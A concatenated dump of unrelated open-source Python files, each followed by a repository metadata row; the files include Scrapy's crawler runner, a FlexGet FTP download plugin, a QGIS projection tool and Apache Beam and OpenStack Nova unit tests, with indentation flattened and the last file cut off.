self._crawlers = set()
self._active = set()
@property
def spiders(self):
warnings.warn("CrawlerRunner.spiders attribute is renamed to "
"CrawlerRunner.spider_loader.",
category=ScrapyDeprecationWarning, stacklevel=2)
return self.spider_loader
def crawl(self, crawler_or_spidercls, *args, **kwargs):
"""
Run a crawler with the provided arguments.
It will call the given Crawler's :meth:`~Crawler.crawl` method, while
keeping track of it so it can be stopped later.
If `crawler_or_spidercls` isn't a :class:`~scrapy.crawler.Crawler`
instance, this method will try to create one using this parameter as
the spider class given to it.
Returns a deferred that is fired when the crawling is finished.
:param crawler_or_spidercls: already created crawler, or a spider class
or spider's name inside the project to create it
:type crawler_or_spidercls: :class:`~scrapy.crawler.Crawler` instance,
:class:`~scrapy.spiders.Spider` subclass or string
:param list args: arguments to initialize the spider
:param dict kwargs: keyword arguments to initialize the spider
"""
crawler = crawler_or_spidercls
if not isinstance(crawler_or_spidercls, Crawler):
crawler = self._create_crawler(crawler_or_spidercls)
self.crawlers.add(crawler)
d = crawler.crawl(*args, **kwargs)
self._active.add(d)
def _done(result):
self.crawlers.discard(crawler)
self._active.discard(d)
return result
return d.addBoth(_done)
def _create_crawler(self, spidercls):
if isinstance(spidercls, six.string_types):
spidercls = self.spider_loader.load(spidercls)
return Crawler(spidercls, self.settings)
def stop(self):
"""
Stops simultaneously all the crawling jobs taking place.
Returns a deferred that is fired when they all have ended.
"""
return defer.DeferredList([c.stop() for c in list(self.crawlers)])
@defer.inlineCallbacks
def join(self):
"""
join()
Returns a deferred that is fired when all managed :attr:`crawlers` have
completed their executions.
"""
while self._active:
yield defer.DeferredList(self._active)
class CrawlerProcess(CrawlerRunner):
"""
A class to run multiple scrapy crawlers in a process simultaneously.
This class extends :class:`~scrapy.crawler.CrawlerRunner` by adding support
for starting a Twisted `reactor`_ and handling shutdown signals, like the
keyboard interrupt command Ctrl-C. It also configures top-level logging.
This utility should be a better fit than
:class:`~scrapy.crawler.CrawlerRunner` if you aren't running another
Twisted `reactor`_ within your application.
The CrawlerProcess object must be instantiated with a
:class:`~scrapy.settings.Settings` object.
This class shouldn't be needed (since Scrapy is responsible of using it
accordingly) unless writing scripts that manually handle the crawling
process. See :ref:`run-from-script` for an example.
"""
def __init__(self, settings=None):
super(CrawlerProcess, self).__init__(settings)
install_shutdown_handlers(self._signal_shutdown)
configure_logging(self.settings)
log_scrapy_info(self.settings)
def _signal_shutdown(self, signum, _):
install_shutdown_handlers(self._signal_kill)
signame = signal_names[signum]
logger.info("Received %(signame)s, shutting down gracefully. Send again to force ",
{'signame': signame})
reactor.callFromThread(self._graceful_stop_reactor)
def _signal_kill(self, signum, _):
install_shutdown_handlers(signal.SIG_IGN)
signame = signal_names[signum]
logger.info('Received %(signame)s twice, forcing unclean shutdown',
{'signame': signame})
reactor.callFromThread(self._stop_reactor)
def start(self, stop_after_crawl=True):
"""
This method starts a Twisted `reactor`_, adjusts its pool size to
:setting:`REACTOR_THREADPOOL_MAXSIZE`, and installs a DNS cache based
on :setting:`DNSCACHE_ENABLED` and :setting:`DNSCACHE_SIZE`.
If `stop_after_crawl` is True, the reactor will be stopped after all
crawlers have finished, using :meth:`join`.
:param boolean stop_after_crawl: stop or not the reactor when all
crawlers have finished
"""
if stop_after_crawl:
d = self.join()
# Don't start the reactor if the deferreds are already fired
if d.called:
return
d.addBoth(self._stop_reactor)
reactor.installResolver(self._get_dns_resolver())
tp = reactor.getThreadPool()
tp.adjustPoolsize(maxthreads=self.settings.getint('REACTOR_THREADPOOL_MAXSIZE'))
reactor.addSystemEventTrigger('before', 'shutdown', self.stop)
reactor.run(installSignalHandlers=False) # blocking call
def _get_dns_resolver(self):
if self.settings.getbool('DNSCACHE_ENABLED'):
cache_size = self.settings.getint('DNSCACHE_SIZE')
else:
cache_size = 0
return CachingThreadedResolver(
reactor=reactor,
cache_size=cache_size,
timeout=self.settings.getfloat('DNS_TIMEOUT')
)
def _graceful_stop_reactor(self):
d = self.stop()
d.addBoth(self._stop_reactor)
return d
def _stop_reactor(self, _=None):
try:
reactor.stop()
except RuntimeError: # raised if already stopped or in shutdown stage
pass
def _get_spider_loader(settings):
""" Get SpiderLoader instance from settings """
if settings.get('SPIDER_MANAGER_CLASS'):
warnings.warn(
'SPIDER_MANAGER_CLASS option is deprecated. '
'Please use SPIDER_LOADER_CLASS.',
category=ScrapyDeprecationWarning, stacklevel=2
)
cls_path = settings.get('SPIDER_MANAGER_CLASS',
settings.get('SPIDER_LOADER_CLASS'))
loader_cls = load_object(cls_path)
try:
verifyClass(ISpiderLoader, loader_cls)
except DoesNotImplement:
warnings.warn(
'SPIDER_LOADER_CLASS (previously named SPIDER_MANAGER_CLASS) does '
'not fully implement scrapy.interfaces.ISpiderLoader interface. '
'Please add all missing methods to avoid unexpected runtime errors.',
category=ScrapyDeprecationWarning, stacklevel=2
)
return loader_cls.from_settings(settings.frozencopy())
| bdh1011/wau | venv/lib/python2.7/site-packages/scrapy/crawler.py | Python | mit | 11,081 |
# -*- coding: utf-8 -*-
from django.db import models, migrations
def migrate_requested_on(apps, schema_editor):
Changeset = apps.get_model("changeset", "Changeset")
for changeset in Changeset.objects.all():
if not changeset.requested_on:
changeset.requested_on = changeset.committed_on
changeset.save()
class Migration(migrations.Migration):
dependencies = [
('changeset', '0004_changeset_requested_on'),
]
operations = [
migrations.RunPython(migrate_requested_on),
] | tzhaoredhat/automation | pdc/apps/changeset/migrations/0005_changeset_requested_on_data_migration.py | Python | mit | 543 |
import logging
import os
import ftplib
from urlparse import urlparse
from flexget import plugin
from flexget.event import event
log = logging.getLogger('ftp')
class OutputFtp(object):
"""
Ftp Download plugin
input-url: ftp://<user>:<password>@<host>:<port>/<path to file>
Example: ftp://anonymous:[email protected]:21/torrent-files-dir
config:
ftp_download:
tls: False
ftp_tmp_path: /tmp
TODO:
- Resume downloads
- create banlists files
- validate connection parameters
"""
schema = {
'type': 'object',
'properties': {
'use-ssl': {'type': 'boolean', 'default': False},
'ftp_tmp_path': {'type': 'string', 'format': 'path'},
'delete_origin': {'type': 'boolean', 'default': False}
},
'additionalProperties': False
}
def prepare_config(self, config, task):
config.setdefault('use-ssl', False)
config.setdefault('delete_origin', False)
config.setdefault('ftp_tmp_path', os.path.join(task.manager.config_base, 'temp'))
return config
def ftp_connect(self, config, ftp_url, current_path):
if config['use-ssl']:
ftp = ftplib.FTP_TLS()
else:
ftp = ftplib.FTP()
log.debug("Connecting to " + ftp_url.hostname)
ftp.connect(ftp_url.hostname, ftp_url.port)
ftp.login(ftp_url.username, ftp_url.password)
ftp.sendcmd('TYPE I')
ftp.set_pasv(True)
ftp.cwd(current_path)
return ftp
def check_connection(self, ftp, config, ftp_url, current_path):
try:
ftp.voidcmd("NOOP")
except:
ftp = self.ftp_connect(config, ftp_url, current_path)
return ftp
def on_task_download(self, task, config):
config = self.prepare_config(config, task)
for entry in task.accepted:
ftp_url = urlparse(entry.get('url'))
current_path = os.path.dirname(ftp_url.path)
try:
ftp = self.ftp_connect(config, ftp_url, current_path)
except:
entry.failed("Unable to connect to server")
break
if not os.path.isdir(config['ftp_tmp_path']):
log.debug('creating base path: %s' % config['ftp_tmp_path'])
os.mkdir(config['ftp_tmp_path'])
file_name = os.path.basename(ftp_url.path)
try:
# Directory
ftp = self.check_connection(ftp, config, ftp_url, current_path)
ftp.cwd(file_name)
self.ftp_walk(ftp, os.path.join(config['ftp_tmp_path'], file_name), config, ftp_url, ftp_url.path)
ftp = self.check_connection(ftp, config, ftp_url, current_path)
ftp.cwd('..')
if config['delete_origin']:
ftp.rmd(file_name)
except ftplib.error_perm:
# File
self.ftp_down(ftp, file_name, config['ftp_tmp_path'], config, ftp_url, current_path)
ftp.close()
def on_task_output(self, task, config):
"""Count this as an output plugin."""
def ftp_walk(self, ftp, tmp_path, config, ftp_url, current_path):
log.debug("DIR->" + ftp.pwd())
log.debug("FTP tmp_path : " + tmp_path)
try:
ftp = self.check_connection(ftp, config, ftp_url, current_path)
dirs = ftp.nlst(ftp.pwd())
except ftplib.error_perm as ex:
log.info("Error %s" % ex)
return ftp
if not dirs:
return ftp
for file_name in (path for path in dirs if path not in ('.', '..')):
file_name = os.path.basename(file_name)
try:
ftp = self.check_connection(ftp, config, ftp_url, current_path)
ftp.cwd(file_name)
if not os.path.isdir(tmp_path):
os.mkdir(tmp_path)
log.debug("Directory %s created" % tmp_path)
ftp = self.ftp_walk(ftp,
os.path.join(tmp_path, os.path.basename(file_name)),
config,
ftp_url,
os.path.join(current_path, os.path.basename(file_name)))
ftp = self.check_connection(ftp, config, ftp_url, current_path)
ftp.cwd('..')
if config['delete_origin']:
ftp.rmd(os.path.basename(file_name))
except ftplib.error_perm:
ftp = self.ftp_down(ftp, os.path.basename(file_name), tmp_path, config, ftp_url, current_path)
ftp = self.check_connection(ftp, config, ftp_url, current_path)
return ftp
def ftp_down(self, ftp, file_name, tmp_path, config, ftp_url, current_path):
log.debug("Downloading %s into %s" % (file_name, tmp_path))
if not os.path.exists(tmp_path):
os.makedirs(tmp_path)
local_file = open(os.path.join(tmp_path, file_name), 'a+b')
ftp = self.check_connection(ftp, config, ftp_url, current_path)
try:
ftp.sendcmd("TYPE I")
file_size = ftp.size(file_name)
except Exception as e:
file_size = 1
max_attempts = 5
log.info("Starting download of %s into %s" % (file_name, tmp_path))
while file_size > local_file.tell():
try:
if local_file.tell() != 0:
ftp = self.check_connection(ftp, config, ftp_url, current_path)
ftp.retrbinary('RETR %s' % file_name, local_file.write, local_file.tell())
else:
ftp = self.check_connection(ftp, config, ftp_url, current_path)
ftp.retrbinary('RETR %s' % file_name, local_file.write)
except Exception as error:
if max_attempts != 0:
log.debug("Retrying download after error %s" % error)
else:
log.error("Too many errors downloading %s. Aborting." % file_name)
break
local_file.close()
if config['delete_origin']:
ftp = self.check_connection(ftp, config, ftp_url, current_path)
ftp.delete(file_name)
return ftp
@event('plugin.register')
def register_plugin():
plugin.register(OutputFtp, 'ftp_download', api_ver=2)
| thalamus/Flexget | flexget/plugins/output/ftp_download.py | Python | mit | 6,524 |
# -*- coding: utf-8 -*-
"""
***************************************************************************
extractprojection.py
---------------------
Date : September 2013
Copyright : (C) 2013 by Alexander Bruy
Email : alexander dot bruy at gmail dot com
***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************
"""
__author__ = 'Alexander Bruy'
__date__ = 'September 2013'
__copyright__ = '(C) 2013, Alexander Bruy'
# This will get replaced with a git SHA1 when you do a git archive
__revision__ = '$Format:%H$'
import os
from qgis.PyQt.QtGui import QIcon
from osgeo import gdal, osr
from processing.algs.gdal.GdalAlgorithm import GdalAlgorithm
from processing.core.parameters import ParameterRaster
from processing.core.parameters import ParameterBoolean
pluginPath = os.path.split(os.path.split(os.path.dirname(__file__))[0])[0]
class ExtractProjection(GdalAlgorithm):
INPUT = 'INPUT'
PRJ_FILE = 'PRJ_FILE'
def __init__(self):
super().__init__()
def initAlgorithm(self, config=None):
self.addParameter(ParameterRaster(self.INPUT, self.tr('Input file')))
self.addParameter(ParameterBoolean(self.PRJ_FILE,
self.tr('Create also .prj file'), False))
def name(self):
return 'extractprojection'
def displayName(self):
return self.tr('Extract projection')
def icon(self):
return QIcon(os.path.join(pluginPath, 'images', 'gdaltools', 'projection-export.png'))
def group(self):
return self.tr('Raster projections')
def groupId(self):
return 'rasterprojections'
def getConsoleCommands(self, parameters, context, feedback, executing=True):
return ["extractprojection"]
def processAlgorithm(self, parameters, context, feedback):
rasterPath = self.getParameterValue(self.INPUT)
createPrj = self.getParameterValue(self.PRJ_FILE)
raster = gdal.Open(str(rasterPath))
crs = raster.GetProjection()
geotransform = raster.GetGeoTransform()
raster = None
outFileName = os.path.splitext(str(rasterPath))[0]
if crs != '' and createPrj:
tmp = osr.SpatialReference()
tmp.ImportFromWkt(crs)
tmp.MorphToESRI()
crs = tmp.ExportToWkt()
tmp = None
with open(outFileName + '.prj', 'wt') as prj:
prj.write(crs)
with open(outFileName + '.wld', 'wt') as wld:
wld.write('%0.8f\n' % geotransform[1])
wld.write('%0.8f\n' % geotransform[4])
wld.write('%0.8f\n' % geotransform[2])
wld.write('%0.8f\n' % geotransform[5])
wld.write('%0.8f\n' % (geotransform[0] +
0.5 * geotransform[1] +
0.5 * geotransform[2]))
wld.write('%0.8f\n' % (geotransform[3] +
0.5 * geotransform[4] +
0.5 * geotransform[5]))
| CS-SI/QGIS | python/plugins/processing/algs/gdal/extractprojection.py | Python | gpl-2.0 | 3,629 |
# -*- coding: utf-8 -*-
from ..internal.OCR import OCR
class GigasizeCom(OCR):
__name__ = "GigasizeCom"
__type__ = "ocr"
__version__ = "0.17"
__status__ = "testing"
__description__ = """Gigasize.com ocr plugin"""
__license__ = "GPLv3"
__authors__ = [("pyLoad Team", "[email protected]")]
def recognize(self, image):
self.load_image(image)
self.threshold(2.8)
self.run_tesser(True, False, False, True)
return self.result_captcha
| Arno-Nymous/pyload | module/plugins/captcha/GigasizeCom.py | Python | gpl-3.0 | 496 |
# https://djangosnippets.org/snippets/2533/
import inspect
from django.utils.html import strip_tags
from django.utils.encoding import force_unicode
def process_docstring(app, what, name, obj, options, lines):
# This causes import errors if left outside the function
from django.db import models
# Only look at objects that inherit from Django's base model class
if inspect.isclass(obj) and issubclass(obj, models.Model):
# Grab the field list from the meta class
fields = obj._meta.fields
for field in fields:
# Decode and strip any html out of the field's help text
help_text = strip_tags(force_unicode(field.help_text))
# Decode and capitalize the verbose name, for use if there isn't
# any help text
verbose_name = force_unicode(field.verbose_name).capitalize()
if help_text:
# Add the model field to the end of the docstring as a param
# using the help text as the description
lines.append(u':param %s: %s' % (field.attname, help_text))
else:
# Add the model field to the end of the docstring as a param
# using the verbose name as the description
lines.append(u':param %s: %s' % (field.attname, verbose_name))
# Add the field's type to the docstring
if isinstance(field, models.ForeignKey):
to = field.rel.to
lines.append(u':type %s: %s to :class:`~%s.%s`' % (field.attname, type(field).__name__, to.__module__, to.__name__))
else:
lines.append(u':type %s: %s' % (field.attname, type(field).__name__))
# Return the extended docstring
return lines
| waseem18/oh-mainline | vendor/packages/django-http-proxy/docs/_ext/django_models.py | Python | agpl-3.0 | 1,773 |
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from __future__ import absolute_import
import unittest
import hamcrest as hc
from apache_beam.metrics.cells import DistributionData
from apache_beam.metrics.cells import DistributionResult
from apache_beam.metrics.execution import MetricKey
from apache_beam.metrics.execution import MetricResult
from apache_beam.metrics.execution import MetricUpdates
from apache_beam.metrics.metricbase import MetricName
from apache_beam.runners.direct.direct_metrics import DirectMetrics
class DirectMetricsTest(unittest.TestCase):
name1 = MetricName('namespace1', 'name1')
name2 = MetricName('namespace1', 'name2')
name3 = MetricName('namespace2', 'name1')
bundle1 = object() # For this test, any object can be a bundle
bundle2 = object()
def test_combiner_functions(self):
metrics = DirectMetrics()
counter = metrics._counters['anykey']
counter.commit_logical(self.bundle1, 5)
self.assertEqual(counter.extract_committed(), 5)
with self.assertRaises(TypeError):
counter.commit_logical(self.bundle1, None)
distribution = metrics._distributions['anykey']
distribution.commit_logical(self.bundle1, DistributionData(4, 1, 4, 4))
self.assertEqual(distribution.extract_committed(),
DistributionResult(DistributionData(4, 1, 4, 4)))
with self.assertRaises(AttributeError):
distribution.commit_logical(self.bundle1, None)
def test_commit_logical_no_filter(self):
metrics = DirectMetrics()
metrics.commit_logical(
self.bundle1,
MetricUpdates(
counters={MetricKey('step1', self.name1): 5,
MetricKey('step1', self.name2): 8},
distributions={
MetricKey('step1', self.name1): DistributionData(8, 2, 3, 5)}))
metrics.commit_logical(
self.bundle1,
MetricUpdates(
counters={MetricKey('step2', self.name1): 7,
MetricKey('step1', self.name2): 4},
distributions={
MetricKey('step1', self.name1): DistributionData(4, 1, 4, 4)}))
results = metrics.query()
hc.assert_that(
results['counters'],
hc.contains_inanyorder(*[
MetricResult(MetricKey('step1', self.name2), 12, 0),
MetricResult(MetricKey('step2', self.name1), 7, 0),
MetricResult(MetricKey('step1', self.name1), 5, 0)]))
hc.assert_that(
results['distributions'],
hc.contains_inanyorder(
MetricResult(MetricKey('step1', self.name1),
DistributionResult(
DistributionData(12, 3, 3, 5)),
DistributionResult(
DistributionData(0, 0, None, None)))))
def test_apply_physical_no_filter(self):
metrics = DirectMetrics()
metrics.update_physical(object(),
MetricUpdates(
counters={MetricKey('step1', self.name1): 5,
MetricKey('step1', self.name3): 8}))
metrics.update_physical(object(),
MetricUpdates(
counters={MetricKey('step2', self.name1): 7,
MetricKey('step1', self.name3): 4}))
results = metrics.query()
hc.assert_that(results['counters'],
hc.contains_inanyorder(*[
MetricResult(MetricKey('step1', self.name1), 0, 5),
MetricResult(MetricKey('step1', self.name3), 0, 12),
MetricResult(MetricKey('step2', self.name1), 0, 7)]))
metrics.commit_physical(object(), MetricUpdates())
results = metrics.query()
hc.assert_that(results['counters'],
hc.contains_inanyorder(*[
MetricResult(MetricKey('step1', self.name1), 0, 5),
MetricResult(MetricKey('step1', self.name3), 0, 12),
MetricResult(MetricKey('step2', self.name1), 0, 7)]))
def test_apply_physical_logical(self):
metrics = DirectMetrics()
dist_zero = DistributionData(0, 0, None, None)
metrics.update_physical(
object(),
MetricUpdates(
counters={MetricKey('step1', self.name1): 7,
MetricKey('step1', self.name2): 5,
MetricKey('step2', self.name1): 1},
distributions={MetricKey('step1', self.name1):
DistributionData(3, 1, 3, 3),
MetricKey('step2', self.name3):
DistributionData(8, 2, 4, 4)}))
results = metrics.query()
hc.assert_that(results['counters'],
hc.contains_inanyorder(*[
MetricResult(MetricKey('step1', self.name1), 0, 7),
MetricResult(MetricKey('step1', self.name2), 0, 5),
MetricResult(MetricKey('step2', self.name1), 0, 1)]))
hc.assert_that(results['distributions'],
hc.contains_inanyorder(*[
MetricResult(
MetricKey('step1', self.name1),
DistributionResult(dist_zero),
DistributionResult(DistributionData(3, 1, 3, 3))),
MetricResult(
MetricKey('step2', self.name3),
DistributionResult(dist_zero),
DistributionResult(DistributionData(8, 2, 4, 4)))]))
metrics.commit_physical(
object(),
MetricUpdates(
counters={MetricKey('step1', self.name1): -3,
MetricKey('step2', self.name1): -5},
distributions={MetricKey('step1', self.name1):
DistributionData(8, 4, 1, 5),
MetricKey('step2', self.name2):
DistributionData(8, 8, 1, 1)}))
results = metrics.query()
hc.assert_that(results['counters'],
hc.contains_inanyorder(*[
MetricResult(MetricKey('step1', self.name1), 0, 4),
MetricResult(MetricKey('step1', self.name2), 0, 5),
MetricResult(MetricKey('step2', self.name1), 0, -4)]))
hc.assert_that(results['distributions'],
hc.contains_inanyorder(*[
MetricResult(
MetricKey('step1', self.name1),
DistributionResult(dist_zero),
DistributionResult(DistributionData(11, 5, 1, 5))),
MetricResult(
MetricKey('step2', self.name3),
DistributionResult(dist_zero),
DistributionResult(DistributionData(8, 2, 4, 4))),
MetricResult(
MetricKey('step2', self.name2),
DistributionResult(dist_zero),
DistributionResult(DistributionData(8, 8, 1, 1)))]))
metrics.commit_logical(
object(),
MetricUpdates(
counters={MetricKey('step1', self.name1): 3,
MetricKey('step1', self.name2): 5,
MetricKey('step2', self.name1): -3},
distributions={MetricKey('step1', self.name1):
DistributionData(11, 5, 1, 5),
MetricKey('step2', self.name2):
DistributionData(8, 8, 1, 1),
MetricKey('step2', self.name3):
DistributionData(4, 1, 4, 4)}))
results = metrics.query()
hc.assert_that(results['counters'],
hc.contains_inanyorder(*[
MetricResult(MetricKey('step1', self.name1), 3, 4),
MetricResult(MetricKey('step1', self.name2), 5, 5),
MetricResult(MetricKey('step2', self.name1), -3, -4)]))
hc.assert_that(results['distributions'],
hc.contains_inanyorder(*[
MetricResult(
MetricKey('step1', self.name1),
DistributionResult(DistributionData(11, 5, 1, 5)),
DistributionResult(DistributionData(11, 5, 1, 5))),
MetricResult(
MetricKey('step2', self.name3),
DistributionResult(DistributionData(4, 1, 4, 4)),
DistributionResult(DistributionData(8, 2, 4, 4))),
MetricResult(
MetricKey('step2', self.name2),
DistributionResult(DistributionData(8, 8, 1, 1)),
DistributionResult(DistributionData(8, 8, 1, 1)))]))
if __name__ == '__main__':
unittest.main()
| mxm/incubator-beam | sdks/python/apache_beam/runners/direct/direct_metrics_test.py | Python | apache-2.0 | 9,689 |
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2011 OpenStack LLC.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import datetime
from lxml import etree
import webob
from nova.api.openstack.compute.contrib import simple_tenant_usage
from nova.compute import api
from nova import context
from nova import flags
from nova.openstack.common import jsonutils
from nova.openstack.common import policy as common_policy
from nova.openstack.common import timeutils
from nova import policy
from nova import test
from nova.tests.api.openstack import fakes
FLAGS = flags.FLAGS
SERVERS = 5
TENANTS = 2
HOURS = 24
ROOT_GB = 10
EPHEMERAL_GB = 20
MEMORY_MB = 1024
VCPUS = 2
NOW = timeutils.utcnow()
START = NOW - datetime.timedelta(hours=HOURS)
STOP = NOW
def fake_instance_type_get(self, context, instance_type_id):
return {'id': 1,
'vcpus': VCPUS,
'root_gb': ROOT_GB,
'ephemeral_gb': EPHEMERAL_GB,
'memory_mb': MEMORY_MB,
'name':
'fakeflavor'}
def get_fake_db_instance(start, end, instance_id, tenant_id):
return {'id': instance_id,
'uuid': '00000000-0000-0000-0000-00000000000000%02d' % instance_id,
'image_ref': '1',
'project_id': tenant_id,
'user_id': 'fakeuser',
'display_name': 'name',
'state_description': 'state',
'instance_type_id': 1,
'launched_at': start,
'terminated_at': end}
def fake_instance_get_active_by_window(self, context, begin, end, project_id):
return [get_fake_db_instance(START,
STOP,
x,
"faketenant_%s" % (x / SERVERS))
for x in xrange(TENANTS * SERVERS)]
class SimpleTenantUsageTest(test.TestCase):
def setUp(self):
super(SimpleTenantUsageTest, self).setUp()
self.stubs.Set(api.API, "get_instance_type",
fake_instance_type_get)
self.stubs.Set(api.API, "get_active_by_window",
fake_instance_get_active_by_window)
self.admin_context = context.RequestContext('fakeadmin_0',
'faketenant_0',
is_admin=True)
self.user_context = context.RequestContext('fakeadmin_0',
'faketenant_0',
is_admin=False)
self.alt_user_context = context.RequestContext('fakeadmin_0',
'faketenant_1',
is_admin=False)
def _test_verify_index(self, start, stop):
req = webob.Request.blank(
'/v2/faketenant_0/os-simple-tenant-usage?start=%s&end=%s' %
(start.isoformat(), stop.isoformat()))
req.method = "GET"
req.headers["content-type"] = "application/json"
res = req.get_response(fakes.wsgi_app(
fake_auth_context=self.admin_context))
self.assertEqual(res.status_int, 200)
res_dict = jsonutils.loads(res.body)
usages = res_dict['tenant_usages']
for i in xrange(TENANTS):
self.assertEqual(int(usages[i]['total_hours']),
SERVERS * HOURS)
self.assertEqual(int(usages[i]['total_local_gb_usage']),
SERVERS * (ROOT_GB + EPHEMERAL_GB) * HOURS)
self.assertEqual(int(usages[i]['total_memory_mb_usage']),
SERVERS * MEMORY_MB * HOURS)
self.assertEqual(int(usages[i]['total_vcpus_usage']),
SERVERS * VCPUS * HOURS)
self.assertFalse(usages[i].get('server_usages'))
def test_verify_index(self):
self._test_verify_index(START, STOP)
def test_verify_index_future_end_time(self):
future = NOW + datetime.timedelta(hours=HOURS)
self._test_verify_index(START, future)
def test_verify_show(self):
self._test_verify_show(START, STOP)
def test_verify_show_future_end_time(self):
future = NOW + datetime.timedelta(hours=HOURS)
self._test_verify_show(START, future)
def _get_tenant_usages(self, detailed=''):
req = webob.Request.blank(
'/v2/faketenant_0/os-simple-tenant-usage?'
'detailed=%s&start=%s&end=%s' %
(detailed, START.isoformat(), STOP.isoformat()))
req.method = "GET"
req.headers["content-type"] = "application/json"
res = req.get_response(fakes.wsgi_app(
fake_auth_context=self.admin_context))
self.assertEqual(res.status_int, 200)
res_dict = jsonutils.loads(res.body)
return res_dict['tenant_usages']
def test_verify_detailed_index(self):
usages = self._get_tenant_usages('1')
for i in xrange(TENANTS):
servers = usages[i]['server_usages']
for j in xrange(SERVERS):
self.assertEqual(int(servers[j]['hours']), HOURS)
def test_verify_simple_index(self):
usages = self._get_tenant_usages(detailed='0')
for i in xrange(TENANTS):
self.assertEqual(usages[i].get('server_usages'), None)
def test_verify_simple_index_empty_param(self):
# NOTE(lzyeval): 'detailed=&start=..&end=..'
usages = self._get_tenant_usages()
for i in xrange(TENANTS):
self.assertEqual(usages[i].get('server_usages'), None)
def _test_verify_show(self, start, stop):
tenant_id = 0
req = webob.Request.blank(
'/v2/faketenant_0/os-simple-tenant-usage/'
'faketenant_%s?start=%s&end=%s' %
(tenant_id, start.isoformat(), stop.isoformat()))
req.method = "GET"
req.headers["content-type"] = "application/json"
res = req.get_response(fakes.wsgi_app(
fake_auth_context=self.user_context))
self.assertEqual(res.status_int, 200)
res_dict = jsonutils.loads(res.body)
usage = res_dict['tenant_usage']
servers = usage['server_usages']
self.assertEqual(len(usage['server_usages']), SERVERS)
uuids = ['00000000-0000-0000-0000-00000000000000%02d' %
(x + (tenant_id * SERVERS)) for x in xrange(SERVERS)]
for j in xrange(SERVERS):
delta = STOP - START
uptime = delta.days * 24 * 3600 + delta.seconds
self.assertEqual(int(servers[j]['uptime']), uptime)
self.assertEqual(int(servers[j]['hours']), HOURS)
self.assertTrue(servers[j]['instance_id'] in uuids)
def test_verify_show_cant_view_other_tenant(self):
req = webob.Request.blank(
'/v2/faketenant_1/os-simple-tenant-usage/'
'faketenant_0?start=%s&end=%s' %
(START.isoformat(), STOP.isoformat()))
req.method = "GET"
req.headers["content-type"] = "application/json"
rules = {
"compute_extension:simple_tenant_usage:show":
[["role:admin"], ["project_id:%(project_id)s"]]
}
common_policy.set_brain(common_policy.HttpBrain(rules))
try:
res = req.get_response(fakes.wsgi_app(
fake_auth_context=self.alt_user_context))
self.assertEqual(res.status_int, 403)
finally:
policy.reset()
class SimpleTenantUsageSerializerTest(test.TestCase):
def _verify_server_usage(self, raw_usage, tree):
self.assertEqual('server_usage', tree.tag)
# Figure out what fields we expect
not_seen = set(raw_usage.keys())
for child in tree:
self.assertTrue(child.tag in not_seen)
not_seen.remove(child.tag)
self.assertEqual(str(raw_usage[child.tag]), child.text)
self.assertEqual(len(not_seen), 0)
def _verify_tenant_usage(self, raw_usage, tree):
self.assertEqual('tenant_usage', tree.tag)
# Figure out what fields we expect
not_seen = set(raw_usage.keys())
for child in tree:
self.assertTrue(child.tag in not_seen)
not_seen.remove(child.tag)
if child.tag == 'server_usages':
for idx, gr_child in enumerate(child):
self._verify_server_usage(raw_usage['server_usages'][idx],
gr_child)
else:
self.assertEqual(str(raw_usage[child.tag]), child.text)
self.assertEqual(len(not_seen), 0)
def test_serializer_show(self):
serializer = simple_tenant_usage.SimpleTenantUsageTemplate()
today = timeutils.utcnow()
yesterday = today - datetime.timedelta(days=1)
raw_usage = dict(
tenant_id='tenant',
total_local_gb_usage=789,
total_vcpus_usage=456,
total_memory_mb_usage=123,
total_hours=24,
start=yesterday,
stop=today,
server_usages=[dict(
instance_id='00000000-0000-0000-0000-0000000000000000',
name='test',
hours=24,
memory_mb=1024,
local_gb=50,
vcpus=1,
tenant_id='tenant',
flavor='m1.small',
started_at=yesterday,
ended_at=today,
state='terminated',
uptime=86400),
dict(
instance_id='00000000-0000-0000-0000-0000000000000002',
name='test2',
hours=12,
memory_mb=512,
local_gb=25,
vcpus=2,
tenant_id='tenant',
flavor='m1.tiny',
started_at=yesterday,
ended_at=today,
state='terminated',
uptime=43200),
],
)
tenant_usage = dict(tenant_usage=raw_usage)
text = serializer.serialize(tenant_usage)
print text
tree = etree.fromstring(text)
self._verify_tenant_usage(raw_usage, tree)
def test_serializer_index(self):
serializer = simple_tenant_usage.SimpleTenantUsagesTemplate()
today = timeutils.utcnow()
yesterday = today - datetime.timedelta(days=1)
raw_usages = [dict(
tenant_id='tenant1',
total_local_gb_usage=1024,
total_vcpus_usage=23,
total_memory_mb_usage=512,
total_hours=24,
start=yesterday,
stop=today,
server_usages=[dict(
instance_id='00000000-0000-0000-0000-0000000000000001',
name='test1',
hours=24,
memory_mb=1024,
local_gb=50,
vcpus=2,
tenant_id='tenant1',
flavor='m1.small',
started_at=yesterday,
ended_at=today,
state='terminated',
uptime=86400),
dict(
instance_id='00000000-0000-0000-0000-0000000000000002',
name='test2',
hours=42,
memory_mb=4201,
local_gb=25,
vcpus=1,
tenant_id='tenant1',
flavor='m1.tiny',
started_at=today,
ended_at=yesterday,
state='terminated',
uptime=43200),
],
),
dict(
tenant_id='tenant2',
total_local_gb_usage=512,
total_vcpus_usage=32,
total_memory_mb_usage=1024,
total_hours=42,
start=today,
stop=yesterday,
server_usages=[dict(
instance_id='00000000-0000-0000-0000-0000000000000003',
name='test3',
hours=24,
memory_mb=1024,
local_gb=50,
vcpus=2,
tenant_id='tenant2',
flavor='m1.small',
started_at=yesterday,
ended_at=today,
state='terminated',
uptime=86400),
dict(
